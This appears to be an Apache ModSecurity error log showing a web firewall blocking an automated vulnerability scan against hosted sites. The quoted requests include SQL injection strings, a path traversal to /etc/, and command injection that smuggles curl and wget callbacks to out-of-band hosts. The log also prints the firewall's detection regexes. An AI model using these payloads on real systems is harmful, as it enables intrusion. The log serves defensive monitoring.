[Tue May 26 12:52:45.362879 2026] [security2:error] [pid 461618:tid 461830] [client 20.104.227.76:30673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.glorodavionics.com"] [uri "/wk/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kkgAAANc"]
[Tue May 26 12:52:45.465498 2026] [security2:error] [pid 461618:tid 461824] [client 23.94.40.119:33958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/opensis/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kmQAAANE"]
[Tue May 26 12:52:45.579636 2026] [security2:error] [pid 461618:tid 461811] [client 23.94.40.119:33980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/magmi_run.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kmwAAAMQ"]
[Tue May 26 12:52:45.580965 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:33994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:fileName. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ahVKRVyiSlSCHr1fdr2knAAAALc"]
[Tue May 26 12:52:45.677551 2026] [security2:error] [pid 461618:tid 461832] [client 23.94.40.119:33998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/graph_realtime.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kowAAANk"]
[Tue May 26 12:52:45.680893 2026] [security2:error] [pid 461618:tid 461793] [client 23.94.40.119:34010] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKRVyiSlSCHr1fdr2kpAAAALI"]
[Tue May 26 12:52:45.683220 2026] [security2:error] [pid 461618:tid 461834] [client 23.94.40.119:34026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/jsonws/invoke"] [unique_id "ahVKRVyiSlSCHr1fdr2kpQAAANs"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
[Tue May 26 12:52:45.683848 2026] [security2:error] [pid 461618:tid 461791] [client 23.94.40.119:34020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/mainfunction.cgi"] [unique_id "ahVKRVyiSlSCHr1fdr2kpgAAALA"]
[Tue May 26 12:52:45.866431 2026] [security2:error] [pid 461618:tid 461858] [client 23.94.40.119:34042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKRVyiSlSCHr1fdr2kqQAAAPM"]
[Tue May 26 12:52:45.866847 2026] [cgid:error] [pid 461618:tid 461825] [client 23.94.40.119:34034] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/libagent.cgi: script not found or unable to stat
[Tue May 26 12:52:45.867689 2026] [security2:error] [pid 461618:tid 461795] [client 23.94.40.119:34056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\\\\*|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\\\\*| |\\\\{|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]|\\\\bunion\\\\b.{1,256}?select.{1,256}[a-z0-9\\\\(\\\\)].{1,256}(?:from|#| ..." at ARGS:username. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "296"] [id "340016"] [rev "46"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  SQL injection attempt detected"] [data "union select 1,'admin','1c85d47ff80b5ff2a4dd577e8e5f8e9d',0,0,1,1,8"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/eonapi/getApiKey"] [unique_id "ahVKRVyiSlSCHr1fdr2kqgAAALQ"]
[Tue May 26 12:52:46.091794 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:34064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/getcfg.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kuwAAAKM"]
[Tue May 26 12:52:46.145647 2026] [security2:error] [pid 461618:tid 461774] [client 157.20.138.61:56683] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kvQAAAJ8"]
[Tue May 26 12:52:46.145780 2026] [security2:error] [pid 461618:tid 461774] [client 157.20.138.61:56683] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kvQAAAJ8"]
[Tue May 26 12:52:46.293136 2026] [security2:error] [pid 461618:tid 461753] [client 23.94.40.119:34090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kyQAAAIo"]
[Tue May 26 12:52:46.355961 2026] [security2:error] [pid 461618:tid 461768] [client 23.94.40.119:34098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/magmi/web/info.php"] [unique_id "ahVKRlyiSlSCHr1fdr2kygAAAJk"]
[Tue May 26 12:52:46.391640 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:34118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/index.php"] [unique_id "ahVKRlyiSlSCHr1fdr2k0QAAANM"]
[Tue May 26 12:52:46.852696 2026] [security2:error] [pid 461618:tid 461781] [client 23.94.40.119:34150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:procedure\\\\s+analyse\\\\s.{0,100}\\\\(|create\\\\s+(procedure|function)\\\\s.{0,100}\\\\w+\\\\s.{0,100}\\\\(\\\\s.{0,200}\\\\)\\\\s.{0,100}declare[^\\\\w]+[@#]\\\\s.{0,100}\\\\w+|exec\\\\s.{0,100}\\\\(\\\\s.{0,200}@|\\\\b(?:sleep|benchmark)\\\\b ?\\\\( ?[0-9])" at REQUEST_URI. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "273"] [id "380122"] [rev "5"] [msg "Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections"] [data "sleep(6"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/eonapi/getApiKey"] [unique_id "ahVKRlyiSlSCHr1fdr2k6wAAAKY"]
[Tue May 26 12:52:46.869198 2026] [security2:error] [pid 461618:tid 461874] [client 23.94.40.119:34164] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "wget http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upload"] [unique_id "ahVKRlyiSlSCHr1fdr2k7gAAAQM"]
[Tue May 26 12:52:47.082079 2026] [security2:error] [pid 461618:tid 461756] [client 23.94.40.119:34182] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/storfs-asup"] [unique_id "ahVKR1yiSlSCHr1fdr2k_QAAAI0"]
[Tue May 26 12:52:47.376419 2026] [autoindex:error] [pid 461618:tid 461838] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:52:47.542989 2026] [security2:error] [pid 461618:tid 461866] [client 23.94.40.119:34194] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgz7fdto5mdq4wt.oast.fun+-H+'User-Agent:+wj58VO'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgadczq8jhp1bjm.oast.fun+-H+'User-Agent:+wj58VO'};"] [unique_id "ahVKR1yiSlSCHr1fdr2lJQAAAPs"]
[Tue May 26 12:52:47.546717 2026] [security2:error] [pid 461618:tid 461860] [client 23.94.40.119:34192] ModSecurity: Access denied with code 406 (phase 2). Match of "rx (?:/count\\\\.cgi|^/magento/index\\\\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" against "REQUEST_URI" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "421"] [id "340014"] [rev "17"] [msg "Atomicorp.com WAF Rules: CMD injection"] [data "curl http"] [severity "CRITICAL"] [tag "Command Injection"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgmgnffcd3ntgb9.oast.fun+-H+'User-Agent:+wj58VO'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/d8akjpc38ndbrs5c98fgzyrie1cqwmgi5.oast.fun+-H+'User-Agent:+wj58VO'};"] [unique_id "ahVKR1yiSlSCHr1fdr2lJgAAAPU"]
[Tue May 26 12:52:47.567279 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:34218] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKR1yiSlSCHr1fdr2lKAAAAOA"]
[Tue May 26 12:52:47.770940 2026] [security2:error] [pid 461618:tid 461832] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKR1yiSlSCHr1fdr2lIQAAANk"]
[Tue May 26 12:52:47.841838 2026] [security2:error] [pid 461618:tid 461864] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKR1yiSlSCHr1fdr2lLwAAAPk"], referer: https://www.ucdc.co.in/
[Tue May 26 12:52:47.993351 2026] [security2:error] [pid 461618:tid 461801] [client 23.94.40.119:35968] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/fileSave.jsp"] [unique_id "ahVKR1yiSlSCHr1fdr2lNwAAALo"]
[Tue May 26 12:52:48.289135 2026] [security2:error] [pid 461618:tid 461751] [client 23.94.40.119:35998] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKSFyiSlSCHr1fdr2lPAAAAIg"]
[Tue May 26 12:52:48.370058 2026] [security2:error] [pid 461618:tid 461852] [client 23.94.40.119:36012] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lPgAAAO0"]
[Tue May 26 12:52:48.370846 2026] [security2:error] [pid 461618:tid 461857] [client 23.94.40.119:36016] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lPwAAAPI"]
[Tue May 26 12:52:48.446885 2026] [cgid:error] [pid 461618:tid 461810] [client 23.94.40.119:36020] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/init_ctl.cgi: script not found or unable to stat
[Tue May 26 12:52:48.555899 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:36034] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tmui/locallb/workspace/tmshCmd.jsp"] [unique_id "ahVKSFyiSlSCHr1fdr2lRwAAANM"]
[Tue May 26 12:52:48.593944 2026] [cgid:error] [pid 461618:tid 461752] [client 23.94.40.119:36048] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/mt: script not found or unable to stat
[Tue May 26 12:52:48.613463 2026] [ssl:error] [pid 461618:tid 461837] [client 23.94.40.119:36064] AH02032: Hostname www.madrasbarassociation.org.in.svijaykumar.in provided via SNI and hostname d8akjpc38ndbrs5c98fgxkxzgpbsiiogc.oast.fun provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:52:48.634782 2026] [security2:error] [pid 461618:tid 461780] [client 23.94.40.119:36076] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/apply_sec.cgi"] [unique_id "ahVKSFyiSlSCHr1fdr2lTgAAAKU"]
[Tue May 26 12:52:49.380616 2026] [security2:error] [pid 461618:tid 461836] [client 23.94.40.119:36086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKSVyiSlSCHr1fdr2lZAAAAN0"]
[Tue May 26 12:52:49.490285 2026] [autoindex:error] [pid 461618:tid 461833] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:52:49.730735 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:36104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer/adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcQAAANU"]
[Tue May 26 12:52:49.731198 2026] [security2:error] [pid 461618:tid 461850] [client 23.94.40.119:36092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcAAAAOs"]
[Tue May 26 12:52:49.737500 2026] [security2:error] [pid 461618:tid 461778] [client 23.94.40.119:36120] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/_adminer.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcgAAAKM"]
[Tue May 26 12:52:49.738510 2026] [security2:error] [pid 461618:tid 461785] [client 23.94.40.119:36110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/adminer/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2lcwAAAKo"]
[Tue May 26 12:52:49.738638 2026] [security2:error] [pid 461618:tid 461814] [client 23.94.40.119:36126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/_adminer/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2ldAAAAMc"]
[Tue May 26 12:52:49.739608 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:36090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKSVyiSlSCHr1fdr2ldQAAAMo"]
[Tue May 26 12:52:50.558818 2026] [security2:error] [pid 461618:tid 461774] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKSlyiSlSCHr1fdr2lhAAAAJ8"]
[Tue May 26 12:52:50.985741 2026] [security2:error] [pid 461618:tid 461749] [client 23.94.40.119:36152] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-json/buddypress/v1/signup"] [unique_id "ahVKSlyiSlSCHr1fdr2loQAAAIY"]
[Tue May 26 12:52:51.474352 2026] [security2:error] [pid 461618:tid 461810] [client 23.94.40.119:36190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVKS1yiSlSCHr1fdr2lsgAAAMM"]
[Tue May 26 12:52:51.793123 2026] [security2:error] [pid 461618:tid 461852] [client 185.191.171.16:56918] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVKS1yiSlSCHr1fdr2lvQAAAO0"]
[Tue May 26 12:52:51.793282 2026] [security2:error] [pid 461618:tid 461852] [client 185.191.171.16:56918] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVKS1yiSlSCHr1fdr2lvQAAAO0"]
[Tue May 26 12:52:51.870134 2026] [security2:error] [pid 461618:tid 461837] [client 23.94.40.119:36218] ModSecurity: Access denied with code 406 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "232"] [id "900331"] [msg "Joomla Com_Content SQL Injection POST"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/logupload"] [unique_id "ahVKS1yiSlSCHr1fdr2lvgAAAN4"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in
[Tue May 26 12:52:52.593343 2026] [cgid:error] [pid 461618:tid 461808] [client 23.94.40.119:36294] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/cgiServer: script not found or unable to stat
[Tue May 26 12:52:52.749394 2026] [security2:error] [pid 461618:tid 461794] [client 23.94.40.119:36308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/api/v1/method.callAnon/getPasswordPolicy"] [unique_id "ahVKTFyiSlSCHr1fdr2l4gAAALM"]
[Tue May 26 12:52:52.927547 2026] [security2:error] [pid 461618:tid 461860] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKTFyiSlSCHr1fdr2l3AAAAPU"]
[Tue May 26 12:52:53.374021 2026] [security2:error] [pid 461618:tid 461809] [client 23.94.40.119:36340] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/template"] [unique_id "ahVKTVyiSlSCHr1fdr2mKwAAAMI"]
[Tue May 26 12:52:53.481760 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:36348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/elFinder/php/connector.minimal.php"] [unique_id "ahVKTVyiSlSCHr1fdr2mLAAAAI8"]
